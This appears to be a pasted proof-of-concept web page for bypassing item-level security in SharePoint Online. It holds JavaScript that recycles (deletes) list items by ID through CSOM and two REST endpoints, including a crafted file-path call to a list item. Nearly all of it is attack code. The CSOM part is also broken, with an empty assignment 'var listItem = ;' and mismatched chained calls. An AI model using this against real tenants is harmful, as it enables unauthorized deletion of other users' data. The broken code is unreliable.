
SPO bypass sec bits POC

a guest
Jun 5th, 2017
  1.         <input type="text" id="delete-input" />
  2. <div style="margin: 20px 0">
  3.         <input type="button" style="margin: 0; display: block;" value="RECYCLE AS CSOM" id="delete-button-csom" />
  4.         <input type="button" style="margin: 10px 0; display: block;" value="RECYCLE (ITEM API) AS REST" id="delete-button-rest" />
  5.         <input type="button" style="margin: 10px 0;display: block;" value="RECYCLE (FOLDER API) AS REST" id="delete-button-rest-folder" />
  6. </div>
  7.         <p id="delete-result"><p/>  
  8.  
  9. <script>
  10.            
  11.             var button = document.getElementById("delete-button-csom");
  12.             button.addEventListener('click', () => {
  13.             var input = document.getElementById("delete-input");
  14.             var container = document.getElementById("delete-result");
  15.  
  16.             if(isNaN(input.value)) {
  17.                 return;
  18.             }
  19.             var ctx =  SP.ClientContext.get_current();
  20.             var list = ctx.get_web().get_lists().getByTitle("TEST_BITS").list.getItemById(15).recycle();
  21.             var listItem = ;
  22.             listItem.recycle();
  23.             ctx.executeQueryAsync(() => {
  24.             container.innerHTML = "DELETED!";    
  25.         }, (s, e) => {
  26.             container.innerHTML = "FAIL:\r\n " + e.get_message();
  27.         });      
  28.        
  29.             });
  30.            
  31.            
  32.         button = document.getElementById("delete-button-rest");
  33.        
  34.             button.addEventListener('click', () => {
  35.             var input = document.getElementById("delete-input");
  36.             var container = document.getElementById("delete-result");
  37.  
  38.             if(isNaN(input.value)) {
  39.                 return;
  40.             }
  41.            
  42.             var request = new XMLHttpRequest();
  43.             request.open('POST', "https://TENANT.sharepoint.com/sites/dev-pp002/_api/web/lists/GetByTitle('TEST_BITS')/items("+Number(input.value)+")/recycle()", true);
  44.             request.setRequestHeader('Content-Type', 'application/json;odata=verbose');
  45.             request.setRequestHeader('X-RequestDigest', document.getElementById("__REQUESTDIGEST").value);
  46.             request.setRequestHeader('accept', 'application/json;odata=verbose');
  47.            
  48.             request.send({});
  49.             request.onload = function() {
  50.               if (request.status >= 200 && request.status < 400) {
  51.                 var resp = request.responseText;
  52.                 container.innerHTML = "OKAY: " + resp;
  53.               } else {
  54.                 var resp = request.responseText;
  55.                 container.innerHTML = "FAIL: " + resp;
  56.               }
  57.             };     
  58.                         });    
  59.                        
  60.         button = document.getElementById("delete-button-rest-folder");
  61.        
  62.             button.addEventListener('click', () => {
  63.             var input = document.getElementById("delete-input");
  64.             var container = document.getElementById("delete-result");
  65.  
  66.             if(isNaN(input.value)) {
  67.                 return;
  68.             }
  69.            
  70.             var request = new XMLHttpRequest();
  71.            
  72.             var sub = encodeURIComponent("/sites/dev-pp002/Lists/TEST_BITS/"+Number(input.value)+"_.000");
  73.             var q = "https://TENANT.sharepoint.com/sites/dev-pp002/_api/web/GetFileByServerRelativePath(DecodedUrl=@a1)/recycle?@a1='"+sub+"'";
  74.            
  75.             request.open('POST', q, true);
  76.             request.setRequestHeader('Content-Type', 'application/json;odata=verbose');
  77.             request.setRequestHeader('X-RequestDigest', document.getElementById("__REQUESTDIGEST").value);
  78.             request.setRequestHeader('accept', 'application/json;odata=verbose');
  79.            
  80.             request.send({});
  81.             request.onload = function() {
  82.               if (request.status >= 200 && request.status < 400) {
  83.                 var resp = request.responseText;
  84.                 container.innerHTML = "OKAY: " + resp;
  85.               } else {
  86.                 var resp = request.responseText;
  87.                 container.innerHTML = "FAIL: " + resp;
  88.               }
  89.             };     
  90.                         });                        
  91. </script>